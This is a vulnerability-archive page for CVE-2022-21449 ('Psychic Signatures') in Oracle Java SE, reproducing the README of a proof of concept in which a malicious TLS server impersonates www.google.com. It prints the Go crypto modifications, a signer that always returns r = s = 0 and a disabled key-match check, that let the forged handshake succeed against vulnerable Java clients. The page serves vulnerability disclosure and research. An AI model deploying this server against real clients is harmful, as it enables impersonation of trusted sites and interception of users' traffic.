Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CVE-2022-21449 PoC — Oracle Java SE 输入验证错误漏洞

Source
Associated Vulnerability
Title:Oracle Java SE 输入验证错误漏洞 (CVE-2022-21449)
Description:Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 17.0.2 and 18; Oracle GraalVM Enterprise Edition: 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).
Description
CVE-2022-21449 Proof of Concept demonstrating its usage with a client running on a vulnerable Java version and a malicious TLS server
Readme
# CVE-2022-21449-TLS-PoC
CVE-2022-21449 ([also dubbed Psychic Signatures in the vulnerability writeup by Neil Madden](https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/)) Proof of Concept demonstrating its usage with a vulnerable client and a malicious TLS server.

The malicious server presents a valid (as of 2022-04-20) cert chain for www.google.com which has an ECDSA pub key (secp256r1). However, the `crypto/ecdsa` package has been modified to present an invalid signature with `r = s = 0`. The vulnerable client accepts this invalid signature, allowing the rest of the TLS handshake to continue.

Aside from the removed `*_test.go` files while building & exploration, [these modifications to the golang crypto library](#modifications-to-the-golang-crypto-library) were necessary for the malicious TLS server. They can also be found by searching/grepping for `CVE-2022-21449` in the `go/src` directory.

# Building
Requires some existing golang installation as well as maven, then run `./build.sh`.

Tested on Ubuntu 20.04.4 LTS (WSL2) with OpenJDK 16.0.1 (build 16.0.1+9-Ubuntu-120.04, 2021-04-20)

# Demo
https://user-images.githubusercontent.com/7225227/164332612-832b046b-cd2e-46e8-b3d6-1da36e290992.mp4

# Modifications to the golang crypto library


In `crypto/ecdsa/ecdsa.go`, the function `signGeneric` was essentially modified to:
```go
func signGeneric(priv *PrivateKey, csprng *cipher.StreamReader, c elliptic.Curve, hash []byte) (r, s *big.Int, err error) {
        // SEC 1, Version 2.0, Section 4.1.3
        // CVE-2022-21449 - Modified and removed all calculations. Return r = s = 0
        r = new(big.Int)
        s = new(big.Int)
        return
}
```

And in `crypto/tls/tls.go`, the function `X509KeyPair` has been changed to disable verification checks that a given private key matches the X.509 certificate's public key for ECDSA public keys:
```go
// X509KeyPair parses a public/private key pair from a pair of
// PEM encoded data. On successful return, Certificate.Leaf will be nil because
// the parsed form of the certificate is not retained.
func X509KeyPair(certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
        fail := func(err error) (Certificate, error) { return Certificate{}, err }
        ...
        switch pub := x509Cert.PublicKey.(type) {
        ...
        case *ecdsa.PublicKey:
                // CVE-2022-21449: Modified checks away
                _, ok := cert.PrivateKey.(*ecdsa.PrivateKey)
                if !ok {
                        return fail(errors.New("tls: private key type does not match public key type"))
                }
                /*if pub.X.Cmp(priv.X) != 0 || pub.Y.Cmp(priv.Y) != 0 {
                        return fail(errors.New("tls: private key does not match public key"))
                }*/
         ...
}
```

# Credits
- [Neil Madden](https://twitter.com/neilmaddog): finding and disclosing CVE-2022-21449, as [detailed in their excellent writeup](https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/).
- [Khaled Nassar](https://twitter.com/kmhnassar): This PoC.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →